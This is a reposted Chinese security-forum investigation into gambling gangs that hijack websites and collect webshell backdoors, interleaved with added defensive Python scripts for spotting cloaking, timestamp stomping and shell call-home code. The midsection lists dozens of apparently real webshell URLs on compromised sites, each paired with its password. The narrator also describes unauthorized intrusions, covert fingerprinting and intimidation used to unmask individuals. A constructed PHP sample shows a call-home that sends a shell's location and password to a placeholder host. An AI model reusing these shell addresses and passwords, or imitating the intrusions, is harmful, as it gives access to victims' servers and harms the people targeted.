tw4ld6 posted on 2024-10-3 10:03:14

An investigation into China's largest webshell backdoor box: every publicly available big shell (大马) has fallen


    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">T00ls admin team note:</strong></p><strong style="color: blue;">This article was submitted to the T00ls admin mailbox shortly after 15:00 on the afternoon of 31 October 2016. Toward its content we take a partly affirmative, partly skeptical stance: we are aware of some of the unscrupulous methods of certain black-market (黑产) crews, but whether this really is "China's largest" as the article claims, we reserve judgment. One further statement: we cannot rule out that some members of these crews lurk on T00ls to pick up techniques, but T00ls itself has no connection with them whatsoever. We hope the relevant departments will investigate thoroughly; these black-market crews are the greatest enemy of the development of network security technology.</strong>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><a style="color: black;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmTeJLzSAhDmBbtNOnmh8849JOQ0SMSqCWMofH9MtgHAeNmXjSl60AsQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></a><span style="color: black;"><strong style="color: blue;">×I. Origin</strong></span> It began one day after I had owned a large target (it took a long time): the next day, when I went into the webshell, I found a new backdoor in the current directory. On closer inspection it turned out to be the work of a BC (博彩, gambling) gang; the site had been globally hijacked by a black-hat SEO program, whose code is shown below.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><a style="color: black;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmKKcoEjRkfq2m2CiaS8vAcsns7FBT0Oc8qXlm1xzOBsLVubmQW7eSjUg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></a></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><a style="color: black;">https://www.so.com/s?q=%E5%A8%B1 ... newhome&amp;adv_t=d</a></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">It looks aimed at 360 (search). Using 360 to search the site for gambling-related keywords, the results stunned me!!!! A huge number of sites had been hijacked, including quite a few that I had penetration-tested. It looks as if 360 itself were controlling the rankings; in fact criminals were exploiting a flaw in 360's ranking algorithm. Judging by the indexing dates it began appearing in 2014, which means this problem has existed for years and is only now being exposed.</p>
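    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The hijack described above shows one page to ordinary visitors and a different, gambling-laden page to the search engine's crawler or to visitors arriving from its results, which is why the site owner never notices. The check below is an added example, not code from the original post: it fetches a URL under three identities (plain browser, crawler User-Agent, search-engine Referer) and diffs the visible text. The 360Spider User-Agent string, the keyword list, the 0.7 similarity cutoff and the fake site it runs against offline are all assumptions of this example; fetch_http() is the real fetcher.</p>

```python
"""Check a site for crawler- or referrer-keyed hijacking (cloaking).

Added example, not code from the original post. fetch_http() is the real
fetcher; fake_fetch() and the CLEAN/HIJACKED pages are a constructed site
so the check runs offline. The 360Spider User-Agent string, the keyword list
and the similarity cutoff are assumptions of this example.
"""
import difflib
import re
import urllib.request

BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/47.0.2526 Safari/537.36"
PROFILES = {
    "browser": {"User-Agent": BROWSER_UA},
    "spider": {"User-Agent": "Mozilla/5.0 (compatible; 360Spider; http://webscan.360.cn)"},
    "from_search": {"User-Agent": BROWSER_UA, "Referer": "https://www.so.com/s?q=test"},
}
GAMBLING_TERMS = ("娱乐城", "博彩", "开户", "彩金", "casino", "bet")  # assumed keyword list
SIMILARITY_CUTOFF = 0.7


def fetch_http(url, headers, timeout=10):
    """Plain stdlib fetch; returns the body as text."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def visible_text(html):
    """Crude tag strip; enough to compare what a crawler would index."""
    return re.sub(r"\s+", " ", re.sub(r"<[^>]+>", " ", html)).strip()


def check_cloaking(url, fetch=fetch_http):
    """Fetch url under every profile and compare each against the browser view."""
    bodies = {name: visible_text(fetch(url, hdrs)) for name, hdrs in PROFILES.items()}
    base = bodies["browser"]
    report = {}
    for name in ("spider", "from_search"):
        text = bodies[name]
        similarity = difflib.SequenceMatcher(None, base, text).ratio()
        injected = [t for t in GAMBLING_TERMS if t in text and t not in base]
        report[name] = {"similarity": round(similarity, 3), "injected_terms": injected,
                        "cloaked": similarity < SIMILARITY_CUTOFF or bool(injected)}
    return report


# Constructed site: the clean page for people, a gambling page for crawlers
# and for visitors who arrive from the search engine.
CLEAN = ("<html><head><title>City Library</title></head><body><h1>Opening hours</h1>"
         "<p>Monday to Friday, 9:00 to 17:00. Closed on public holidays.</p></body></html>")
HIJACKED = ("<html><head><title>娱乐城 开户 送彩金</title></head><body><h1>博彩 casino</h1>"
            "<p>bet now</p></body></html>")


def fake_fetch(url, headers):
    """Stand-in for fetch_http() that behaves like the hijacked site."""
    ua, referer = headers.get("User-Agent", ""), headers.get("Referer", "")
    return HIJACKED if "Spider" in ua or "so.com" in referer else CLEAN


if __name__ == "__main__":
    for profile, verdict in check_cloaking("http://victim.example/", fetch=fake_fetch).items():
        print(profile, verdict)
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Against a real site, call check_cloaking("https://your-site.example/") with the default fetcher. A low similarity or injected keywords on either profile means the server, or something in front of it, is discriminating on crawler identity. The from_search profile exists for hijack code that keys on the search-engine Referer rather than on the crawler's User-Agent.</p>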
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Next I began investigating all of the questions, because the social impact of these things being abused is simply too great: I am not the only victim; everyone in this security circle is.</p><span style="color: black;"><strong style="color: blue;">×II. Investigation</strong></span><span style="color: black;"><strong style="color: blue;">
            <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Find the gang behind it</p>
            <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Examine the big-shell (大马) problem</p>Analyze the gang's backdoor signatures
      </strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. I went through all the shells in my hands. First I moved each backdoor to a new location and put JS code at the old backdoor address; it records fingerprint information and performs JSON fetches against the major websites. After that it was just a matter of waiting quietly.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. I analyzed the big shell again. I read every line of its code to death and found nothing wrong; at the same time I captured the shell's traffic and saw no external requests at all. Since I still could not find the problem, I deliberately monitored its packets for a full week, again with no result. By now I was thoroughly puzzled: if the shell is clean, how can someone obtain all of my backdoors? Was my computer compromised? My network environment cannot make any request except HTTP, and all of my backdoors are kept on that Linux box, so that can be ruled out as well. All I could do was think again about what I might have overlooked.</p>3. I checked every site the gang had hijacked: on every one of them the creation times of all files had been updated to the intrusion time, which exactly matches the signature, i.e. these were sites they had just broken into.<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdm58hq0eIRaYhuqypchKWfplJWB0ib5SZaoZ53REWhibjF5x0hLxZvOrcg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">As the figure shows, on almost every compromised site all creation times are refreshed once after the intrusion.</p>
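    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The refreshed timestamps are a usable forensic signature: on a normally maintained site, modification times spread over months of deployments, while a mass rewrite leaves most of the tree inside a single minute. The script below is an added example, not part of the original post. It walks a web root, buckets files by mtime and reports when one minute holds most of the tree. The 80% threshold, the one-minute bucket and the throwaway directory it builds to demonstrate on are assumptions of this example.</p>

```python
"""Find a web root whose file timestamps were mass-reset.

Added example, not from the original post. build_demo_tree() creates a
throwaway fixture in a temp directory; point dominant_cluster() at a real
web root instead. Threshold and bucket size are assumptions.
"""
import os
import tempfile
import time
from collections import Counter


def mtime_buckets(root, bucket=60):
    """Count files per mtime bucket (default: one-minute buckets)."""
    counts, total = Counter(), 0
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            st = os.stat(os.path.join(dirpath, name))
            counts[int(st.st_mtime) // bucket * bucket] += 1
            total += 1
    return counts, total


def dominant_cluster(root, threshold=0.8, bucket=60):
    """Return (bucket_start_epoch, share) when a single bucket holds at least
    `threshold` of all files, which a normally deployed site never does; else None."""
    counts, total = mtime_buckets(root, bucket)
    if not total:
        return None
    start, n = counts.most_common(1)[0]
    share = n / total
    return (start, share) if share >= threshold else None


def build_demo_tree(stomped):
    """Constructed fixture: 40 PHP files whose mtimes span about a year,
    optionally all re-touched to the same 'intrusion' time an hour ago."""
    root = tempfile.mkdtemp(prefix="webroot-")
    now = time.time()
    for i in range(40):
        path = os.path.join(root, f"dir{i % 5}", f"file{i}.php")
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php\n")
        age = i * 9 * 86400  # nine days apart, so no two share a minute
        os.utime(path, (now - age, now - age))
    if stomped:
        intrusion = now - 3600
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                os.utime(os.path.join(dirpath, name), (intrusion, intrusion))
    return root


if __name__ == "__main__":
    for label, stomped in (("normal", False), ("stomped", True)):
        hit = dominant_cluster(build_demo_tree(stomped))
        if hit:
            print(f"{label}: {hit[1]:.0%} of files share the minute {time.ctime(hit[0])}")
        else:
            print(f"{label}: no dominant timestamp cluster")
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">One caveat for real trees: on Linux, touch and utime() rewrite mtime and atime but not ctime, so comparing st_ctime with st_mtime also catches stomping that pushes mtime into the past. That check cannot be demonstrated on a freshly built fixture, where every ctime is "now", which is why the example relies on clustering alone.</p>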
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Afterwards I collected samples of their own backdoors, and there was a new development: I found two different gangs in total, but the big shells they use are all of one family. See attachment 1.</p>
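    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Auditing a collected big-shell sample for a hidden collection address means more than reading the visible code, since the call-home usually sits behind a base64 or gzinflate layer. The scanner below is an added example, not the post's own audit and not any of the gang's code: it peels base64 string literals recursively, flags network-capable and unpack-and-run calls, extracts URLs, and notes whether the code reads its own location ($_SERVER['HTTP_HOST'] plus REQUEST_URI), the combination that marks a shell reporting itself to a box. The PHP it scans is a constructed sample assembled at import time, and box.example is a placeholder for the collection host.</p>

```python
"""Static triage of a PHP big shell for hidden call-home code.

Added example, not code from the original post or from the shells it
describes. The constructed SAMPLE_PHP below hides a report-to-box call
behind two base64 layers; box.example is a placeholder hostname.
"""
import base64
import re

# Calls worth a second look: network-capable, mail, or unpack-and-run.
SUSPECT_FUNCS = ("curl_init", "curl_exec", "file_get_contents", "fsockopen",
                 "fopen", "stream_socket_client", "mail", "eval",
                 "create_function", "gzinflate", "gzuncompress", "str_rot13")
NETWORK_FUNCS = {"curl_exec", "file_get_contents", "fsockopen", "fopen",
                 "stream_socket_client", "mail"}
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
URL_RE = re.compile(r"""https?://[\w.-]+(?:/[^\s'"<>)]*)?""")
OWN_LOCATION = re.compile(r"""\$_SERVER\[['"](?:HTTP_HOST|REQUEST_URI|SCRIPT_NAME|PHP_SELF)['"]\]""")


def decode_layers(src, max_depth=4):
    """Return [src, layer1, layer2, ...]: every base64 literal that decodes
    to text, followed by whatever those decoded texts embed in turn."""
    layers, frontier = [src], [src]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for m in B64_LITERAL.finditer(text):
                try:
                    decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # high-entropy literal that is not base64 text
                if decoded not in layers:
                    layers.append(decoded)
                    found.append(decoded)
        frontier = found
        if not frontier:
            break
    return layers


def audit(src):
    """Summarise suspicious calls, URLs and self-location reads across all layers."""
    layers = decode_layers(src)
    report = {"decoded_layers": len(layers) - 1, "suspect_calls": set(),
              "urls": set(), "reads_own_location": False}
    for text in layers:
        for fn in SUSPECT_FUNCS:
            if re.search(r"@?\b" + re.escape(fn) + r"\s*\(", text):
                report["suspect_calls"].add(fn)
        report["urls"].update(URL_RE.findall(text))
        if OWN_LOCATION.search(text):
            report["reads_own_location"] = True
    # A shell that both reaches the network and reads its own URL is reporting itself.
    report["phones_home"] = (report["reads_own_location"]
                             and bool(report["suspect_calls"] & NETWORK_FUNCS))
    return report


# Constructed sample. The inner payload fetches a placeholder box URL with the
# shell's own host+path appended; it is base64-wrapped once more at import time.
INNER = ('@file_get_contents(base64_decode("aHR0cDovL2JveC5leGFtcGxlL2FwaS5waHA=")'
         '."?u=".urlencode($_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"])."&p=".$pass);')
SAMPLE_PHP = f'''<?php
$pass = "admin888";
if (!isset($_POST["gopwd"]) || $_POST["gopwd"] !== $pass) {{
    die('<form method="post"><input name="gopwd"><input name="godir"></form>');
}}
// looks like an "update check"; really the report-to-box call
eval(base64_decode("{base64.b64encode(INNER.encode()).decode()}"));
'''

if __name__ == "__main__":
    for key, value in audit(SAMPLE_PHP).items():
        print(f"{key}: {value}")
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The decoder only peels base64; gzinflate, str_rot13 and custom XOR wrappers are merely flagged, and for those the safest next step is to run the sample under a PHP build with network functions disabled and log what it tries to reach.</p>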
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">After a careful audit of his shell I found the address of the box where they themselves log big-shell backdoors: api.fwqadmin.com. I am collecting on it for now; at this point… since there were new leads, I will come back to penetrating it later.</p><span style="color: black;"><strong style="color: blue;">×III. Progress</strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">After two days of waiting I finally got the gang's fingerprint information and QQ number. I then went into full-on mode, fired off a volley of lookups, and was able to confirm this person's real identity (known in the circle as Lao Yuan). After that I registered a throwaway QQ account and anonymously added some of the QQ numbers on BC navigation sites. I asked quite a few people and, probably because they are in the same trade, most of them knew him as soon as I asked. Later, claiming to be in the BC business myself, I had deeper conversations with them, in which it came out that this gang's shells are all bought in and that their monthly income is several million RMB, though whether that is true I cannot say. At this point I could basically confirm that my judgment was correct: Lao Yuan is the only lead to the target I now need to investigate.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">I collected all the sites the gang had hijacked, as well as the domains they redirect to their navigation sites. First I broke into the sites that were not mine to collect backdoor samples, and in one I saw a big shell similar to mine but with a different core variable structure. I downloaded it, audited it and captured its traffic, and likewise found nothing wrong. Later, comparing signatures, I found that the POST parameters of the big shells' requests are all the same, gopwd=password&amp;godir=; the signature is identical and the shells themselves show nothing abnormal, so my preliminary judgment was that the problem lies at an upstream network layer, which extracts big-shell addresses from traffic by this signature. If that is really so, it is terrifying.</p>
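    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The shared gopwd=…&amp;godir= login is exactly the kind of signature an on-path collector needs, and because the shells are driven over plain HTTP the password travels in the clear together with the URL. The script below is an added example, not code from the original post or from any of the shells it mentions. It shows what such a collector (or, equally, a defender's sensor) would do with a stream of raw HTTP requests: parse each request, keep only form POSTs whose body carries both parameters, and emit the shell URL, password and requested directory. The two requests it processes are constructed samples; the hostnames, paths and password are placeholders.</p>

```python
"""What an on-path observer sees of a big-shell login over plain HTTP.

Added example; not code from the original post or from the shells it
describes. The two requests in SAMPLE_STREAM are constructed; hostnames,
paths and the password are placeholders.
"""
from urllib.parse import parse_qs, urlsplit

# The login parameters the post reports as common to the SPS-derived shells.
SHELL_PARAMS = ("gopwd", "godir")


def parse_http_request(raw: bytes) -> dict:
    """Split one raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers,
            "body": body.decode("latin-1")}


def shell_login_from_request(raw: bytes):
    """Return (shell_url, password, directory) if this request is a shell login, else None."""
    req = parse_http_request(raw)
    if req["method"] != "POST":
        return None
    if "application/x-www-form-urlencoded" not in req["headers"].get("content-type", ""):
        return None
    form = parse_qs(req["body"], keep_blank_values=True)
    if not all(name in form for name in SHELL_PARAMS):
        return None  # an ordinary form post, even if it carries a "password" field
    host = req["headers"].get("host", "?")
    path = urlsplit(req["target"]).path
    return f"http://{host}{path}", form["gopwd"][0], form["godir"][0]


def harvest(stream):
    """Run every captured request through the matcher; keep the hits."""
    return [hit for hit in map(shell_login_from_request, stream) if hit]


# Constructed sample traffic: one ordinary login form, one shell login.
SAMPLE_STREAM = [
    b"POST /login.php HTTP/1.1\r\nHost: forum.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
    b"username=alice&password=hunter2",
    b"POST /uploads/avatar/1.gif?1=2 HTTP/1.1\r\nHost: victim.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 38\r\n\r\n"
    b"gopwd=s3cret&godir=%2Fvar%2Fwww%2Fhtml",
]

if __name__ == "__main__":
    for url, password, directory in harvest(SAMPLE_STREAM):
        print(f"shell login seen: {url}  password={password}  dir={directory}")
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The same matcher works as a detection rule in the other direction: a server-side sensor that alerts on any POST carrying both parameters catches the shell's first login whatever file name it was uploaded under. Driving shells over HTTPS removes the on-path case but not the server-side one.</p>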
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">I got in touch with Lao Yuan and had some interrogation-style conversations with him. I could tell he was very frightened; he said don't go after me, I used to do fraud. Later he sent me some shell addresses to buy me off, listed below:</p><span style="color: black;">Below are the Xingji (星际) team's</span><a style="color: black;">http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&amp;f=k</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.212200.com/mocuz/down ... e.php?1=2&amp;Z=Opm</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; Hys7sa5wrKKO00GSBtashras28asNNmsn18</p><a style="color: black;">http://www.dailiba.com/about/index.php</a>?v=1
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Tmbdcuu123uualltop</p><a style="color: black;">http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&amp;f=k</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://domarketing.org/phpsso_se ... ons/index.php</a>?v=2ss
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS </p><a style="color: black;">http://www.baby-edu.com/member/a ... /box/index.php?v=qw</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS</p><a style="color: black;">http://www.hongze365.com/data/avatar/1/f</a>/1.g if?1=2&amp;GSW=Curry
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TTrsfsdh748jsusyKKOystw889sbct </p><a style="color: black;">http://www.xiashanet.com/Head_Fo ... ?1=2&amp;BAT=HEHEDE</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qko</p><a style="color: black;">http://www.h</a>bmykjxy.cn/2015/0106/4589.php?1=2&amp;GSW=Curry
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TTrsfsdh748jsusyKKOystw889sbct</p><a style="color: black;">http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&amp;f=k</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.dailiba.com/about/index.php?v=1</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Tmbdcuu123uualltop</p><a style="color: black;">http://www.hubeifc.com/phpcms/mo ... mentl_api.class.php</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; UTF8</p><a style="color: black;">http://domarketing.</a>org/phpsso_se ... ons/index.php?v=2ss
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS</p><a style="color: black;">http://www.huse.edu.cn/phpsso_se ... condif.inc.php?v=sd</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS</p><a style="color: black;">http://ww</a>w.xiashanet.com/Head_Fo ... ?1=2&amp;BAT=HEHEDE
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qko</p><a style="color: black;">http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&amp;GSW=Curry</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">TTrsfsdh748jsusyKKOystw889sbct</p><a style="color: black;">http://www.hongze365.com/data/avatar/1/f/1.g if?1=2&amp;GSW=Curry</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TTrsfsdh748jsusyKKOystw889sbct</p><a style="color: black;">http://bbs.fish3000.com/mobcent/ ... .php?1=2&amp;</a>TD=SAS
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; UUys78tasdRhasd00iasdyTGGgahs</p><a style="color: black;">http://bbs.dqdaily.com/uc_server ... hp?1=2&amp;sha=shan</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7yJJN730%1&amp;uqYYqwhkkasII17vcxQ1mzaPQhn8!P</p><a style="color: black;">http://www.aquasmart.c</a>n/member/f ... end.php?1=1&amp;f=k
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.yangji.com/member/edi ... ?1=2&amp;BAT=HEHEDE</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qko</p><a style="color: black;">http:/</a>/www.shenma66.com/nvzhubo/ ... hiboshipin/inde.php
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7yhaw1woAksmjh892jsasd1sajg</p><a style="color: black;">http://www.shenma66.com/nvzhubo/ ... hiboshipin/inde.php</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">7yhaw1woAksmjh892jsasd1sajg</p><a style="color: black;">http://bbs.taisha.org/pms/data/t ... pl.php?baidu=Google</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; erk12hj3nfher71h3j4k132bnnebr3hg4134</p><a style="color: black;">http://www.168w.cc/api/map/baidu/baidu.php?1=1&amp;f</a>=k
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.dibaichina.com/goldca ... ?1=1&amp;baidu=.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; Tmbdcuu123uualltop</p><a style="color: black;">http://www.ijcz.cn/module/brandj ... p?1=2&amp;BK=ManUt</a>d
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; YIasdwj78954qwtyVVJsarwhahuyrwvsllps2</p><a style="color: black;">http://www.xiashanet.com/Head_Fo ... ?1=2&amp;BAT=HEHEDE</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qkos</p><a style="color: black;">http://www.hotpoll.com.c</a>n/i/index.php?v=111
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp;heiheideheihei</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">What on earth is the Xingji team? Could it be yet another BC outfit? Only after questioning him further did I learn that these shells all belong to another BC operator, said to be the largest gang in the BC circle. By now the water felt deeper and deeper; there was a new direction, and I grew more and more interested in the matter, wanting to see who these people are.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">But for now my target was still "Lao Yuan"; I had to find the person who sold him the shells. After some intimidation he told me, and I also made him provide evidence of the transaction, which I will put in the evidence section later.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Although I had the shell seller's contact details, for a long time I could not get him to accept the friend request. So I took another approach, phishing for evidence, the old trick: JS/JSON at the big-shell address again, with a few lines pasted on it, "add me email:xxx@xxx.com I will give you all webshell", which I had Lao Yuan pass on so that he would contact me himself. Sure enough, he later visited several of the webshell addresses, and at the same time I captured the fingerprints of his real PC and of his proxy. His QQ name is 一切安好 ("All Is Well"). He then contacted me on his own, and in the conversation he said: you're from the Xingji team, right? I got the email you sent. That made me curious: could the Xingji team have found him too? Then he turned to threatening me: we'll have you arrested, we've been investigating you for a year already. I thought to myself, the water really is deep; with all this investigating, who is investigating whom? But he certainly could not hide from me, since I already had evidence of him selling shells. What I did not expect was for him to say that the people behind him are all from the provincial department (省厅): where do you think these shells come from? They are all extracted by state equipment. Good grief, would the state do such a thing? I believe the state pulls website records, and ISPs keep logs for a year, but batch-extracting the access signatures of websites nationwide and putting them up for sale I do not believe; otherwise a hacker has broken into a carrier and has the privileges to extract them. After some more conversation he 